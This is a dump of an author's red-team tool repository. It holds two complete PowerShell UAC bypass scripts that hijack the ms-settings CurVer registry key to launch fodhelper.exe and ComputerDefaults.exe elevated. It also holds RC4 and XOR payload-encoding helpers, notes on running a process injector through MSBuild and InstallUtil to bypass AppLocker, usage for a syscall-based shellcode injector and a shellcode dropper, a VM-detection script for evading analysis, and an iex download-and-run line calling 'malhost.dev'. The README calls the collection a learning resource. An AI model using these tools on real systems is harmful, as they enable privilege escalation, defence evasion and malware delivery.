├── RainCaller ├── Server │ ├── requirements.txt │ └── main.py ├── Client │ ├── RainCaller.sln │ └── RainCaller │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── RainCaller.csproj │ │ ├── RainCaller.cs │ │ ├── Native.cs │ │ └── DInvoke.cs ├── README.md └── .gitignore ├── Marlowe ├── .gitignore ├── README.md └── Marlowe.ps1 ├── SharpSectionJect ├── SharpSectionJectMsBuild │ ├── Notes.txt │ └── SharpSectionJect.xml ├── SharpSectionJectInstallUtil │ ├── Notes.txt │ └── SharpSectionJect.cs ├── enc.py ├── SharpSectionJect │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── SharpSectionJect.csproj │ └── SharpSectionJect.cs ├── SharpSectionJectDLL │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── SharpSectionJectDLL.csproj │ └── SharpSectionJectDLL.cs └── SharpSectionJect.sln ├── Ballista ├── utils │ └── reflectionUtil.py ├── Ballista.sln ├── Ballista │ ├── Properties │ │ └── AssemblyInfo.cs │ ├── Ballista.csproj │ ├── Ballista.cs │ ├── Releases.cs │ ├── Syscalls.cs │ └── Native.cs ├── README.md └── .gitignore ├── UAC_Bypasses ├── FodHelper.ps1 └── ComputerDefaults.ps1 ├── LICENSE ├── README.md └── .gitignore /RainCaller/Server/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask 2 | argparse 3 | pycrypto -------------------------------------------------------------------------------- /Marlowe/.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* 2 | !.vscode/settings.json 3 | !.vscode/tasks.json 4 | !.vscode/launch.json 5 | !.vscode/extensions.json 6 | *.code-workspace 7 | 8 | # Local History for Visual Studio Code 9 | .history/ -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectMsBuild/Notes.txt: -------------------------------------------------------------------------------- 1 | For 64 bit: 2 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpSectionJect.xml 3 | 4 | For 32 bit: 5 | 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe SharpSectionJect.xml -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectInstallUtil/Notes.txt: -------------------------------------------------------------------------------- 1 | Compile with: 2 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:SharpSectionJect.dll SharpSectionJect.cs 3 | 4 | Run with: 5 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false SharpSectionJect.dll 6 | 7 | - Use C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe for 32 bit. -------------------------------------------------------------------------------- /SharpSectionJect/enc.py: -------------------------------------------------------------------------------- 1 | #pip install pycryptodome 2 | import sys, base64 3 | from Crypto.Cipher import ARC4 4 | 5 | def RC4(data, key): 6 | cipher = ARC4.new(key.encode('utf-8')) 7 | return cipher.encrypt(data) 8 | 9 | def B64Enc(text): 10 | return base64.b64encode(text).decode('utf-8') 11 | 12 | def B64Dec(text): 13 | return base64.b64decode(text) 14 | 15 | if __name__ == '__main__': 16 | if len(sys.argv) != 3: 17 | sys.exit(f'{sys.argv[0]} ') 18 | 19 | print('\n' + B64Enc(RC4(B64Dec(sys.argv[1]), sys.argv[2]))) -------------------------------------------------------------------------------- /Ballista/utils/reflectionUtil.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | 4 | def XOR(text, key): 5 | output = "" 6 | for i, character in enumerate(text): 7 | output += chr(ord(character) ^ ord(key[i % len(key)])) 8 | return output 9 | 10 | def B64Enc(text): 11 | return base64.b64encode(text.encode('ascii')).decode('ascii') 12 | 13 | def Debug(text, key): 14 | print(XOR(base64.b64decode(text.encode('ascii')).decode('ascii'), key)) 15 | 16 | if __name__ == '__main__': 17 | if 
len(sys.argv) != 5: 18 | sys.exit(f'{sys.argv[0]} ') 19 | 20 | print('\n' + B64Enc(XOR(f'{sys.argv[2]};{sys.argv[3]};{sys.argv[4]}\n', sys.argv[1])) + '\n') -------------------------------------------------------------------------------- /UAC_Bypasses/FodHelper.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-BypassFodHelper { 2 | Param ( 3 | [String]$program = "cmd /c start powershell.exe" 4 | ) 5 | 6 | New-Item "HKCU:\Software\Classes\.versionobf\Shell\Open\command" -Force| Out-Null 7 | Set-ItemProperty "HKCU:\Software\Classes\.versionobf\Shell\Open\command" -Name "(default)" -Value $program -Force | Out-Null 8 | 9 | New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force|out-null 10 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".versionobf" -force | Out-Null 11 | 12 | Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden 13 | 14 | Start-Sleep 5 15 | 16 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 17 | Remove-Item "HKCU:\Software\Classes\.versionobf\" -Recurse -Force 18 | } -------------------------------------------------------------------------------- /UAC_Bypasses/ComputerDefaults.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-BypassComputerDefaults { 2 | Param ( 3 | [String]$program = "powershell.exe" 4 | ) 5 | 6 | New-Item "HKCU:\software\classes\.versionobf\shell\open\command" -Force | Out-Null 7 | New-ItemProperty "HKCU:\software\classes\.versionobf\shell\open\command" -Name "DelegateExecute" -Value $null -Force | Out-Null 8 | Set-ItemProperty "HKCU:\software\classes\.versionobf\shell\open\command" -Name "(default)" -Value "$program" -Force | Out-Null 9 | 10 | New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force | Out-Null 11 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".versionobf" -force | 
Out-Null 12 | 13 | Start-Process "ComputerDefaults.exe" 14 | Write-Host "Starting the program." 15 | Start-Sleep -Seconds 7 16 | 17 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 18 | Remove-Item "HKCU:\Software\Classes\.versionobf\" -Recurse -Force 19 | } 20 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2022 v3ded 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -------------------------------------------------------------------------------- /Marlowe/README.md: -------------------------------------------------------------------------------- 1 | # Marlowe 2 | **Marlowe** is a PowerShell script which uses WMI to query local and remote systems with the aim of revealing whether said systems are virtual machines. 3 | 4 | # Usage 5 | ### Local system 6 | ``` 7 | PS C:\Users\tester> . .\Marlowe.ps1; Invoke-Marlowe 8 | VM detected! 
(6/8) 9 | ``` 10 | ``` 11 | C:\> powershell.exe -ep bypass -nop -c "iex(New-Object Net.WebClient).downloadString('hxxp://malhost.dev/marlowe.ps1'); Invoke-Marlowe" 12 | VM detected! (4/8) 13 | ``` 14 | 15 | ### Remote system 16 | ``` 17 | PS C:\Users\tester> . .\Marlowe.ps1; Invoke-Marlowe -Machine "fs-m01" 18 | VM detected! (4/8) 19 | ``` 20 | 21 | ### Alternative Usage 22 | One can also utilize individual functions that **Marlowe** uses in order to evaluate whether target system is a VM or not. If the chosen function returns `True` or a non-zero value, target system is (likely) a VM. 23 | ``` 24 | PS C:\Users\tester> . .\Marlowe.ps1 ; Check-VMProcesses 25 | True 26 | ``` 27 | 28 | # False Positives 29 | - 05/23/21 - `Check-PortConnector` returns false positives on ESXi (tested on v7.1) -------------------------------------------------------------------------------- /Ballista/Ballista.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30717.126 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Ballista", "Ballista\Ballista.csproj", "{1D13FD10-3630-48F4-80AF-D0D2BF68AD95}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = 
FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {B111CEDC-17AC-489B-B130-1A820067D840} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31313.79 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RainCaller", "RainCaller\RainCaller.csproj", "{D4149924-35F1-4D5A-BE6F-07FA0541EDE6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {683C8717-525C-42C3-B4C1-E0D025F9DF9A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Ballista/Ballista/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // 
set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Ballista")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Ballista")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("1d13fd10-3630-48f4-80af-d0d2bf68ad95")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("RainCaller")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("RainCaller")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d4149924-35f1-4d5a-be6f-07fa0541ede6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("SharpSectionJect")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSectionJect")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("90a21b70-e37a-46a1-8686-112ef3276af1")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectDLL/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("SharpSectionJectDLL")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSectionJectDLL")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("cf3dd96f-0b1e-48dd-ae70-0aab0dfb270e")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Disclaimer 2 | This repository and the code in it is provided as is. I won't respond to any pull requests or issues. Be responsible and don't use the provided code / tools in a malicious way. I do **not** condone or endorse malicious behavior. 3 | 4 | # Introduction 5 | This repository contains a dump of few tools I wrote over the past 2-3 years. The main reason behind this dump is that most of the methods used in these tools are now considered outdated or obsolete (to an extent). 
While said tools might not be as useful in real life engagements, I hope someone can at least use them as a learning resource instead. 6 | 7 | # Tools 8 | 9 | ### [Ballista](Ballista/) 10 | **Ballista** is a C# tool responsible for x64 cross-process injection. The tool relies on `NtCreateSection()` and `NtMapViewOfSection()` syscalls in order to evade user level API hooking. 11 | 12 | ###### Keywords 13 | - C# 14 | - Syscalls 15 | - Process Injection 16 | - Sections 17 | 18 | *** 19 | 20 | ### [Marlowe](Marlowe/) 21 | **Marlowe** is a PowerShell script which uses WMI to query local and remote systems with the aim of revealing whether said systems are virtual machines. 22 | 23 | ###### Keywords 24 | - PowerShell 25 | - WMI 26 | 27 | *** 28 | 29 | ### [RainCaller](RainCaller/) 30 | **RainCaller** is a shellcode dropper suite consisting of a *Python3* webserver (server) and a *C#* dropper (client). 31 | 32 | ###### Keywords 33 | - C# 34 | - DInvoke 35 | - Python 36 | - Dropper 37 | 38 | *** 39 | 40 | ### [SharpSectionJect](SharpSectionJect/) 41 | **SharpSectionJect** is a collection of C# process injectors in various formats. More specifically *EXE*, *DLL*, *MsBuild* and *InstallUtil* formats. 42 | 43 | ###### Keywords 44 | - C# 45 | - PInvoke 46 | - Sections 47 | - AppLocker bypass 48 | 49 | *** 50 | 51 | ### [UAC_Bypasses](UAC_Bypasses/) 52 | **UAC_Bypasses** is a collection of PowerShell UAC bypasses. These bypasses utilize the *CurVer* trick to bypass registry monitoring. More about this technique can be found on my blog [here](https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses 53 | ). 
54 | 55 | ###### Keywords 56 | - PowerShell 57 | - CurVer 58 | - UAC Bypass -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31313.79 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSectionJect", "SharpSectionJect\SharpSectionJect.csproj", "{90A21B70-E37A-46A1-8686-112EF3276AF1}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSectionJectDLL", "SharpSectionJectDLL\SharpSectionJectDLL.csproj", "{CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}" 9 | EndProject 10 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{FB3214CF-5BBC-4799-BF9C-16069881A6E6}" 11 | ProjectSection(SolutionItems) = preProject 12 | SharpSectionJectInstallUtil\SharpSectionJect.cs = SharpSectionJectInstallUtil\SharpSectionJect.cs 13 | SharpSectionJectMsBuild\SharpSectionJect.xml = SharpSectionJectMsBuild\SharpSectionJect.xml 14 | EndProjectSection 15 | EndProject 16 | Global 17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 18 | Debug|Any CPU = Debug|Any CPU 19 | Release|Any CPU = Release|Any CPU 20 | EndGlobalSection 21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 22 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 23 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Debug|Any CPU.Build.0 = Debug|Any CPU 24 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {90A21B70-E37A-46A1-8686-112EF3276AF1}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 27 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Debug|Any CPU.Build.0 = Debug|Any CPU 28 | 
{CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Release|Any CPU.ActiveCfg = Release|Any CPU 29 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E}.Release|Any CPU.Build.0 = Release|Any CPU 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {10A613CB-AF45-47D1-BD27-8E207A6101F1} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectDLL/SharpSectionJectDLL.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {CF3DD96F-0B1E-48DD-AE70-0AAB0DFB270E} 8 | Library 9 | Properties 10 | SharpSectionJectDLL 11 | SharpSectionJectDLL 12 | v4.0 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | pdbonly 27 | true 28 | bin\Release\ 29 | TRACE 30 | prompt 31 | 4 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJect/SharpSectionJect.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {90A21B70-E37A-46A1-8686-112EF3276AF1} 8 | Exe 9 | SharpSectionJect 10 | SharpSectionJect 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/RainCaller.csproj: -------------------------------------------------------------------------------- 1 | 2 | 
3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D4149924-35F1-4D5A-BE6F-07FA0541EDE6} 8 | Exe 9 | RainCaller 10 | RainCaller 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /Marlowe/Marlowe.ps1: -------------------------------------------------------------------------------- 1 | function Check-PortConnector { 2 | Param([string]$Machine = "localhost") 3 | 4 | return !(Get-WmiObject Win32_PortConnector -ComputerName $Machine -ErrorAction Stop) 5 | } 6 | 7 | function Check-VMProcesses { 8 | Param([string]$Machine = "localhost") 9 | 10 | return (Get-WmiObject Win32_Process -ComputerName $Machine -ErrorAction Stop | Select ProcessName | Select-String "vboxtray|vboxservice|vmtoolsd|vm3dservice" -Quiet) -ne $null 11 | } 12 | 13 | function Check-CPUInfo { 14 | Param([string]$Machine = "localhost") 15 | 16 | $info = Get-WmiObject Win32_Processor -ComputerName $Machine -ErrorAction Stop | Select-Object NumberOfLogicalProcessors, Name 17 | return (($info | Select-Object -ExpandProperty NumberOfLogicalProcessors) -ge 32) + (($info | Select-Object -ExpandProperty Name | Select-String "epyc|xeon" -Quiet) -ne $null) 18 | } 19 | 20 | function Check-BiosSerial { 21 | Param([string]$Machine = "localhost") 22 | 23 | return (Get-WmiObject Win32_Bios -ComputerName $Machine -ErrorAction Stop | Select-Object -ExpandProperty SerialNumber) -eq 0 24 | } 25 | 26 | function Check-SystemMakerInfo { 27 | Param([string]$Machine = "localhost") 28 | 29 | $info = Get-WmiObject Win32_ComputerSystem -ComputerName $Machine -ErrorAction Stop | Select-Object Model, Manufacturer 30 | return (($info | Select-Object -ExpandProperty Model | Select-String "virtualbox|vmware" 
-Quiet) -ne $null) + (($info | Select-Object -ExpandProperty Manufacturer | Select-String "innotek|vmware" -Quiet) -ne $null) 31 | } 32 | 33 | function Check-DriveSize { 34 | Param([string]$Machine = "localhost") 35 | 36 | return (Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" -ComputerName $Machine -ErrorAction Stop | Select-Object -ExpandProperty Size) -le 121111111111 37 | } 38 | 39 | function Invoke-Marlowe { 40 | Param([string]$Machine = "localhost") 41 | 42 | $count = 0 43 | $count += Check-PortConnector -Machine $Machine 44 | $count += Check-VMProcesses -Machine $Machine 45 | $count += Check-CPUInfo -Machine $Machine 46 | $count += Check-BiosSerial -Machine $Machine 47 | $count += Check-SystemMakerInfo -Machine $Machine 48 | $count += Check-DriveSize -Machine $Machine 49 | 50 | If($count -ge 3) { 51 | Write-Host "VM detected! ($count/8)" 52 | } 53 | else { 54 | Write-Host "Not a VM! ($count/8)" 55 | } 56 | } -------------------------------------------------------------------------------- /Ballista/Ballista/Ballista.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1D13FD10-3630-48F4-80AF-D0D2BF68AD95} 8 | Exe 9 | Ballista 10 | Ballista 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | true 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | true 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Ballista/README.md: -------------------------------------------------------------------------------- 1 | # Ballista 2 | **Ballista** is a C# tool responsible for x64 cross-process injection. The tool relies on `NtCreateSection()` and `NtMapViewOfSection()` syscalls in order to evade user level API hooking. 
3 | 4 | # Usage 5 | ```console 6 | Ballista.exe 7 | Ballista.exe 8 | ``` 9 | 10 | | Argument | Description | 11 | | ----------- | ----------- | 12 | | release | Target Release ID (see the releases section) | 13 | | x64_pid | Process ID of a remote process | 14 | | x64_processName | Name of an x64 process to inject into | 15 | | b64_x64sc | Base64 encoded shellcode | 16 | 17 | 18 | ## Releases 19 | > Note: *Windows Server 2016* and *2019* offsets rely on an assumption that the offsets in these specific systems are the same as in their Windows 10 version equivalents. Further testing is advised. 20 | 21 | ### Windows 10 22 | | Windows 10 Version | Release ID | 23 | | ----------- | ----------- | 24 | | 20H2 | 1 | 25 | | 2004 | 2 | 26 | | 1909 | 3 | 27 | | 1903 | 4 | 28 | | 1809 | 5 | 29 | | 1803 | 6 | 30 | | 1709 | 7 | 31 | | 1703 | 8 | 32 | | 1607 | 9 | 33 | | 1511 | 10 | 34 | | 1507 | 11 | 35 | 36 | 37 | ### Windows 7 38 | | Windows 7 Version | Release ID | 39 | | ----------- | ----------- | 40 | | SP1 | 12 | 41 | | SP0 | 12 | 42 | 43 | 44 | ### Windows Server 2019 45 | | Windows 10 Version | Release ID | 46 | | ----------- | ----------- | 47 | | 20H2 | 1 | 48 | | 2004 | 2 | 49 | | 1909 | 3 | 50 | | 1903 | 4 | 51 | | 2019 LTSC (1809) | 5 | 52 | 53 | 54 | ### Windows Server 2016 55 | | Windows 10 Version | Release ID | 56 | | ----------- | ----------- | 57 | | 2016 LTSC (1607) | 9 | 58 | | 1511 | 10 | 59 | | 1507 | 11 | 60 | 61 | 62 | ### Windows Server 2012 63 | | Server 2012 Version | Release ID | 64 | | ----------- | ----------- | 65 | | R2 | 13 | 66 | | SP0 | 14 | 67 | 68 | 69 | # Reflection 70 | **Ballista** can be easily reflected into memory using a serialized base64 string, which can be generated by `reflectionUtil.py`: 71 | ```powershell 72 | PS C:\Users\tester> python .\reflectionUtil.py Key 1 notepad /EiD5PDow... 73 | WV4CAxsSHxMIX0cgBShaJysd... 
